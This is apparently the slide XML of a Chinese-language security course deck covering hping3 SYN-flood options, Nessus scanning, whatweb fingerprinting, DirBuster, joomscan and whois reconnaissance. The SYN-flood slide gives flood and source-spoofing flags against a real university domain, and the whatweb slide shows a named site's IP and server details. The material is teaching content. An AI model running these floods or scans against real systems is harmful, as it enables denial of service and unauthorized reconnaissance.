                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-c 1000 </a:t>
            </a:r>
            <a:r>
              <a:t> 发送的数据包的数量。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-d 120</a:t>
            </a:r>
            <a:r>
              <a:t>  发送到目标机器的每个数据包的大小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-S</a:t>
            </a:r>
            <a:r>
              <a:t>  只发送SYN数据包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-w 64</a:t>
            </a:r>
            <a:r>
              <a:t>  TCP窗口大小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-p 80</a:t>
            </a:r>
            <a:r>
              <a:t>  目的地端口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--flood</a:t>
            </a:r>
            <a:r>
              <a:t>  尽可能快地发送数据包，不需要考虑显示入站回复。洪水攻击模式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--rand-source</a:t>
            </a:r>
            <a:r>
              <a:t>  使用随机性的源头IP地址。还可以使用-a或–spoof来隐藏主机名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>　　www.hdu.edu.cn 目的地IP地址或目标机器的IP地址。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650783" y="7967892"/>
            <a:ext cx="19431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实例应用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Shape 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627463" y="8699500"/>
            <a:ext cx="11605764"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SYN泛洪攻击（DOS）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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5" name="Shape 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="1786025"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1422326"/>
            <a:ext cx="11406727" cy="15268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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>是目前全世界最多人使用的系统漏洞扫描与分析软件</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Al Bayan"/>
                <a:ea typeface="Al Bayan"/>
                <a:cs typeface="Al Bayan"/>
                <a:sym typeface="Al Bayan"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Nessus是安全漏洞自动收集工具，它可同时远程或者在主机上进行检测，扫描各种开放端口的服务器漏洞，是一款综合性漏洞检测工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720449" y="3695699"/>
            <a:ext cx="11747869" cy="162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200"/>
            </a:pPr>
            <a:r>
              <a:t>由于Kali中没有自带Nessus，因此我们需要安装。但是Nessus在Linux下的安装比较复杂，因此我们选择在Windows下安装并且使用Nessus。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>由于专业版的Nessus需要收费，所以我们选择了家庭版。提出申请够，Nessus会给你一个家庭版的序列号，输入后就开始下载。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="408" name="image51.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689899" y="5849937"/>
            <a:ext cx="5808970" cy="3164793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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0" name="Shape 410"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871537" y="263525"/>
            <a:ext cx="10682983" cy="54863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l" defTabSz="914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>下载完成后，通过用户名密码进入nessus。然后添加一个漏洞诊断对象。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="411" name="image52.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193800" y="1020762"/>
            <a:ext cx="9793762" cy="4720700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936624" y="5939321"/>
            <a:ext cx="7040069" cy="5486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l" defTabSz="914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>点击start按钮，开始漏洞诊断。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="413" name="image53.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="931862" y="6685822"/>
            <a:ext cx="10817280" cy="2449334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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5" name="Shape 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642936" y="447675"/>
            <a:ext cx="7196140" cy="54863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l" defTabSz="914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>查看漏洞诊断结果。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="416" name="image54.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1212850"/>
            <a:ext cx="10810372" cy="4525334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769936" y="6080125"/>
            <a:ext cx="11464928" cy="80263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l" defTabSz="914400">
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> 导出报告：扫描完成后可以在在Export中将诊断结果导出为报告。其格式可以为Nessus、pdf、html、CSV、nessus DB。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="image55.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858961" y="7008807"/>
            <a:ext cx="8370890" cy="2257427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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0" name="Shape 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="2098527"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>whatweb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1220556"/>
            <a:ext cx="11406727" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>WhatWeb是一款网站指纹识别工具，主要针对的问题是：“这个网站使用的什么技术？”WhatWeb可以告诉你网站搭建使用的程序，包括何种CMS系统、什么博客系统、Javascript库、web服务器、内嵌设备等。WhatWeb有超过900个插件，并且可以识别版本号、email地址、账号、web框架、SQL错误等等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Shape 422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749298" y="3251199"/>
            <a:ext cx="138430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>简单用法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Shape 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298497" y="3910242"/>
            <a:ext cx="2178206"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>whatweb  URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="424" name="image56.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500942" y="4727945"/>
            <a:ext cx="12283100" cy="1074924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748969" y="6095999"/>
            <a:ext cx="4801236"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例如 whatweb www.sysorem.xyz </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Shape 426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793749" y="6720812"/>
            <a:ext cx="11697486" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>从返回的结果可以看到该网站Web服务器软件为Apache 2.2.15，地区为US，邮箱为master@sysorem.xyz,支持Html5，服务器操作系统为Red Hat Linux，IP地址为52.91.79.239，网站也使用了Jquery库，网站是基于Wordpress 4.5.3 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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8" name="Shape 428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="2255466"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DirBuster</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Shape 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1677756"/>
            <a:ext cx="11406727" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DirButer是一个多线程的基于Java的应用程序设计蛮力Web/应用服务器上的模糊测试工具，主要用于扫描目录和文件名。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739697" y="3213099"/>
            <a:ext cx="10400997" cy="2235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500"/>
            </a:pPr>
            <a:r>
              <a:t>运行在CLI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>dirbuster -H -u https://www.target.com/ -l 字典文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>使用Gui</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>dirbuster -u https://www.target.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="431" name="image57.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757591" y="5967643"/>
            <a:ext cx="10684383" cy="2813729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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33" name="image58.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137701" y="1568184"/>
            <a:ext cx="10260549" cy="7304345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564614" y="712555"/>
            <a:ext cx="11406724"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DirButer扫出的一些目录和文件名。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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6" name="Shape 436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="2307779"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>joomscan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660398" y="1701799"/>
            <a:ext cx="11406727" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> Joomla security scanner可以检测Joomla整站程序搭建的网站是否存在文件包含、sql注入、命令执行等漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869767" y="3809998"/>
            <a:ext cx="11747866" cy="403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1" sz="2200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Joomla Security Scanner的特点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>1.确切的版本探测（可以探测出使用的Joomla整站程序的版本）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>2.常见的Joomla！基于web应用程序防火墙探测。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>3.搜索已知的Joomla安全漏洞和它的组件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>4.文本和HTML格式的检测报告.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>5.立即的软件更新能力</a:t>
            </a:r>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3" name="Shape 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870450" y="459911"/>
            <a:ext cx="3263900"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>网站及服务器信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Shape 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535854" y="1435100"/>
            <a:ext cx="128290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whois</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552689" y="1927687"/>
            <a:ext cx="8280798" cy="231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100"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>whois是用来查询域名的IP以及所有者等信息的传输协议。简单说，whois就是一个用来查询域名是否已经被注册，以及注册域名的详细信息的数据库（如域名所有人、域名注册商）。在whois查询中，注册人姓名和邮箱信息，通常对于测试个人站点非常有用，因为我们可以通过搜索引擎，社交网络，挖掘出很多域名所有人的信息。而对于小站点而言，域名所有人往往就是管理员。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="image5.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
